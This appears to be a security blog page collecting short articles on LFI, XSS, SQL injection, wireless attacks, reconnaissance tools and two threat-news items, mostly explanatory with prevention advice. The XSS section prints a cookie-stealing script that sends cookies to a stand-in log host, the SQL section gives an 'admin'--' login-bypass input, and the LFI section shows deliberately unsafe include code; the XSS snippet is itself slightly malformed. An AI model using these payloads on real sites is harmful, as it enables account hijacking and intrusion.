How Do Hackers Upload Shellcodes Using LFI

 

What is Local File Inclusion (LFI)?

This is a vulnerability commonly found to affect web application that rely on a scripting run time. Local File Inclusion (LFI) or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionally that dynamically includes local files or scripts.

LFI attacks can expose sensitive information, and in severe cases, they can lead to cross-site scripting (XSS) and remote code execution.

An attacker can use remote code execution to create a web shell on the web server, which can be used for website defacement.

How does Local File Inclusion Work?

Usually, the path of the file that you want to open is sent to a function that can then return the content of the file as a string, print it on the current web page, or include it into the document and parse it as application code in the relevant language.

The following is an example in PHP that is vulnerable to Local File Inclusion (LFI).

/**
      * Get the filename from a GET input
      * Example - http://example.com/?file=filename.php
      */
      $file = $_GET['file'];
      
      /**
      * Unsafely include the file
      * Example - filename.php
      */
      include('directory/' . $file);

In the above example, an attacker could make the following request to trick the web application into executing a malicious script such as a webshell that the attacker managed to upload to the web server.

Here’s an example of a vulnerable PHP code that could lead to LFI:-
https://example.com/?page=filename.php

Here, the file uploaded by the attacker will be included and run as the user running the web app.In this way the attacker to run any code they wanted on the web server.

All the things work successfully when the attacker get the access into the website

Protecting Against LFI Attacks

The simplest method/way to eliminate LFI vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included.

Read More

How Do Hackers Hijack Websites And Browser Using Xss

 

What is Cross Site Scripting(XSS)?

Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. This is a combination of HTML and XSS provided by the attacker, but XSS can also be used to deliver malicious downloads, plugins, or media content. In this case hacker execute some malicious links into the website or an app.

If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system.

As a result, the attacker can steal the user’s active session cookie.
Here’s an example:

<script> i=new/**/Image();isrc=http://example.com/log.php?'+document.cookie+' '+document.location</script>

Because XSS can allow untrusted users to execute code in the browser of trusted users and access some types of data, such as session cookies, and many time hackers get some website credentials which they get full control on websites.

How does cross site scripting work?

Cross-site scripting works by manipulating a vulnerable website or an application so that it returns malicious JavaScript to users.The attacker injects some code in it.

Attackers can also carry out an attack by modifying a request. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie.

Here’s an example:

<script> i=new/**/Image();isrc=http://example.com/log.php?'+document.cookie+' '+document.location</script>

While the payload is usually JavaScript, XSS can take place using any client-side language.

What does the attacker do the credentials?

The attacker do these things:-

• *Hijacking A website And Browser
• *Capturing the keystrokes of a user.
• *Redirecting a user to a malicious website.
• *Running web browser-based exploits (e.g., crashing the browser).
• *Obtaining the cookie information of a user who is logged into a website (thus compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.

What are the different types of XSS attacks?

Stored XSS:-

Takes place when the malicious payload is stored in a database. It renders to other users when data is requested—if there is no output encoding or sanitization.

Reflected XSS:-

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

DOM-based XSS:-

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

How to prevent XSS vulnerability?

There are some strategies to prevent XSS attacks:

• *Never trust user input.
• *Implement output encoding.
• *Perform user input validation.
• *Follow the defense in depth principle.
• *Ensure that web application development aligns with OWASP’s XSS Prevention *Cheat Sheet.
• *After remediation, perform penetration testing to confirm it was successful.

Protect your organization by following secure development guidelines—building security in at all phases of the application’s development. Output encoding is also key to preventing XSS vulnerabilities. Make use of output encoding libraries that are relevant to the programming languages and frameworks your organization uses. Also, ensure your developers stay up-to-date with XSS prevention best practices.

Read More

How Hackers Leak Databases | Sql Injection Vulnerablity

 

What is SQL injection?

The Wikipedia article on SQL injection reads:

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SQL Injection is a web-based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.

The underlying fact that allows for SQL injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let’s consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt.

Here is a typical example:

select * from users where username='admin' and password='admin123′;

If the attacker knows the username of the application administrator is admin, he can log in as admin without supplying any password.

admin'–

The query in the back-end looks like:

Select * from users where username='admin'–' and password='xxx';

Note the comment sequence (–) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username='admin';

So password check is bypassed.

Read More

Wireless Hacking Basic Knowledge

 

Wireless Network Sniffing :-

Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

Stations and Access Points :-

A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

Passive Scanning :-

Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

Channels :-

The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

Wired Equivalent Privacy (WEP) :-

It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

Detection of SSID :-

The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

Collecting the Frames for Cracking WEP :-

The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

Detection of the Sniffers :-

Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

Wireless Spoofing :-

There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

Denial of Service :-

A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

MAC Address Spoofing :-

The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

IP spoofing :-

Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

Frame Spoofing :-

The attacker will inject frames that are valid but whose content is carefully spoofed.

Wireless Network Probing :-

The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

AP Weaknesses :-

APs have weaknesses that are both due to design mistakes and user interfaces.

Trojan AP :-

An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

War Driving :-

Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Jamming the Air Waves :-

A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

Tips for Wireless Home Network Security

• Change Default Administrator Passwords (and Usernames)
• Turn on (Compatible) WPA / WEP Encryption
• Change the Default SSID
• Disable SSID Broadcast
• Assign Static IP Addresses to Devices
• Enable MAC Address Filtering
• Turn Off the Network During Extended Periods of Non-Use
• Position the Router or Access Point Safely

Read More

Information Gathering – First Step Of Hacking

 

What’s information gathering?

When it comes to getting a clear information gathering concept, the simplest way to define it would be the process of collecting information about something you are interested in. A practical example: gathering information with your eyes is called visual perception. In the same way, in the digital world, a lot of information can be gathered in different ways, not with your senses, but with several methods, tools and techniques.

Information gathering is a phase of penetration testing or ethical hacking. Where hackers or attackers gather the information as much as possible elated internal and external security architecture.

They have to face a target. The details of any system help the attacker to identify the vulnerabilities within it, which can be exploited and gain access in later faces.

If you have deep knowledge about the target reduces the focus area & brings you closer to the target. More information about target more possibilities to win.

If you have enough required details about the target, you are close to getting key to hacking.

For Example, You focus the target by mean of the range of IP address you have to go through, to hack target or regarding domain information or else.

What are the objectives of information gathering in cybersecurity?

Any basic cybersecurity information gathering process often includes these two types of data collection goals:

• Collecting network data: Such as public, private and associated domain names, network hosts, public and private IP blocks, routing tables, TCP and UDP running services, SSL certificates, open ports and more.
• Collecting system-related information: This includes user enumeration, system groups, OS hostnames, OS system type (probably by fingerprinting), system banners (as seen in the banner grabbing blog post), etc.

But there’s a lot more involved. Let’s learn about it, by exploring the most popular techniques used during this phase.

Information gathering techniques and methods

Ethical hackers use a big variety of techniques and tools to get this precious information about their targets, as well as locations and data collection software they’ll be using towards the information gathering goal.

Let’s look at the top information gathering methods used to gather information about any target.

How to gather information?

• Social engineering: This includes in-person chat, phone conversations and email spoofing attacks. What all these methods have in common is the psychology of human weakness, needed to get maximum data about the target.
• Search engines: Web crawlers can be used to fetch information about anything, and this includes companies, persons, services, and even real hacks, as seen in our previous article about Google Hacking.
• Social networks: Facebook, Twitter, LinkedIn and other social networks are great sources of information to build a profile, especially when targeting individuals.
• Domain names: These are registered by organizations, governments, public and private agencies, and people. Therefore, they’re a great starting point when you want to investigate someone. Personal information, associated domains, projects, services and technologies can be found by inspecting domain name information.
• Internet servers: authoritative DNS servers are a great source of information, as they often include every single surface point exposed to the Internet—which means a direct link to related services such as HTTP, email, etc.

All these techniques are really useful when combined with enterprise security tools. Keep reading to discover how to maximize your information gathering results by using some really cool infosec utilities.

Information gathering tools

There are a lot of tools to discuss when talking about information gathering, including one particular software we can’t avoid mentioning… that’s Kali Linux, one of the most popular cyber security linux distributions around.

We’ve written about the top Kali Linux tools before, but that was a general review of the most popular tools on that Linux distro. When it comes to information gathering, Kali Linux includes one of the biggest collections ever. To be precise, exactly 67 information gathering utilities will help you get all the valuable data you need during your infosec investigations. Creating a full list of all the information gathering tools available would be monumental, not to mention difficult.

That’s why we’ve created a summary of the top 12 most popular tools that, in our experience, may help you during your information gathering process:

• Nmap: Our beloved network scanner will be always in the #1 position when it comes to data gathering tools. It can be used not only to scan ports and service fingerprinting, but also as a DNS enumeration and network mapping tool.
• Unicornscan: Combined with Nmap, it can give you the complete picture of any remote network or host, as it is able to perform asynchronous stateless TCP scanning with all variations of TCP flags, as well as TCP banner grabbing, async UDP Scanning, OS fingerprinting, and much more.
• Sublist3r: This is one of the best subdomain enumeration tools around, one that will help you create a virtual subdomain map of any website in no time. By using Google dorks and other search engines such as Baidu, Ask, Yahoo or Bing, it can also be used to perform a brute force subdomain discovery attack with wordlists, thanks to its subroute integration.
• DMitry: Its name stands for Deepmagic Information Gathering Tool, and is one of the top terminal-based tools when it comes to intel reconnaissance tasks. It will allow you to get any available data from any host, such as subdomains, email addresses, open ports, WHOIS lookups, server data, and more.
• OWASP Amass: Also known simply as ‘Amass’, this information gathering tool helps researchers and IT administrators create a full map of their digital assets by providing an easy way to perform DNS enumeration, asset location, and overall attack surface discovery.
• Axiom: This new tool is one of the best available when you need to get massive amounts of data in a limited time. It’s basically a dynamic infrastructure framework that helps system administrators and researchers build and deploy offensive and defensive security multi-cloud infrastructure in mere seconds, by using pre-installed tools based on OS images.
• Th3inspector: This infosec utility will enable you to fetch all kinds of website-related information, such as page data, phone number, ip addresses of HTTP and email server, perform a domain WHOIS lookup, bypass the Cloudflare proxy, check the age of your domain name, scan remote active services, subdomain mapping, and even work as a CMS detector.
• Devploit: This tool is used to extract DNS and domain data, including DNS lookups, WHOIS lookup information, reverse IP info, port scanning, DNS zone transfer, HTTP-headers, GEOIP lookup, subnet lookup, etc.
• Bettercap: Known as the swiss army knife for networking, it’s used mostly for network recon and information gathering, especially for WiFi, Bluetooth low energy devices and Ethernet networks.
• Traceroute: As one of the most popular network tools used to track the path of networks packets between one IP address to another, it’s a powerful recon tool that will let you gain critical network information about IP addresses and networking routes.
• WHOIS: The WHOIS command is a great source of data for fetching domain- and IP-related information, including tech and admin names, telephones, addresses, country, DNS servers, etc.
• Dig: Whenever you need to find current data about DNS records, Dig is one of the best tools there is to help you to accomplish that task, whether you want to get A, NS, TXT or CNAME records.

Read More

TODAYZOO PHISHING KIT USED TO SWIPE MICROSOFT CREDENTIALS

 Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses a phishing kit built using pieces of code copied from other hackers’ work.

A “phishing kit” is the various software or services designed to facilitate phishing attacks. In this case, the kit has been called ZooToday by Microsoft after some text used by the kit. Microsoft also described it as a ‘Franken-Phish’ because it is made up of different elements, some available for sale through publicly accessible scam sellers or reused and repackaged by other kit resellers.

Microsoft said TodayZoo is using the WorkMail domain AwsApps[.]com to pump out email with links to phishing pages mimicking the Microsoft 365 login page.

Microsoft says the attackers have been creating malicious AWS WorkMail accounts “at scale” but are just using randomly generated domain names instead of names that would represent a legitimate company.

In other words, it’s a crude phishing product likely made on a thin budget, but large enough to be noticeable. It caught Microsoft’s attention because it impersonated Microsoft’s brand and used a technique called “zero-point font obfuscation” – HTML text with a zero font size in an email – to dodge human detection.

Microsoft detected an uptick in zero-font attacks in July. TodayZoo campaigns in April and May of this year typically impersonated Microsoft 365 login pages and a password-reset request. However. Microsoft found that campaigns in August used Xerox-branded fax and scanner notifications to dupe workers into giving up credentials.

Microsoft’s threat researchers have found that most of the phishing landing pages were hosted within cloud provider DigitalOcean.

Those pages were identical to the Microsoft 365 signin page. Another unusual trait was that after harvesting credentials, the stolen information was not forwarded to other email accounts but stored on the site itself. This behaviour was a trait of the TodayZoo phishing kit, which has previously focussed on phishing credentials from Zoom video-meeting accounts.

But Microsoft researchers believe this phishing group is a single operation rather than a network of agents.

“While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits.

These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own,” Microsoft said. Microsoft says it informed Amazon about the TodayZoo phishing campaign and that AWS “promptly took action”.

Read More

Google Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries

 Google’s Threat Analysis Group (TAG) on Thursday said it’s tracking more than 270 government-backed threat actors from more than 50 countries, adding it has approximately sent 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021.

The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from “blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.”

Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed “Operation SpoofedScholars” aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London’s School of Oriental and African Studies (SOAS).

Details of the attack were first publicly documented by enterprise security firm Proofpoint in July 2021. Other past attacks involved the use of a spyware-infested VPN app uploaded to the Google Play Store that, when installed, could be leveraged to siphon sensitive information such as call logs, text messages, contacts, and location data from the infected devices.

Furthermore, an unusual tactic adopted by APT35 concerned the use of Telegram to notify the attackers when phishing sites under their control have been visited in real-time via malicious JavaScript embedded into the pages. The threat actor is also said to have impersonated policy officials by sending “non-malicious first contact email messages” modeled around the Munich Security and Think-20 (T20) Italy conferences as part of a phishing campaign to lure high-profile individuals into visiting rogue websites.

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Google TAG’s Ajax Bash said.

Read More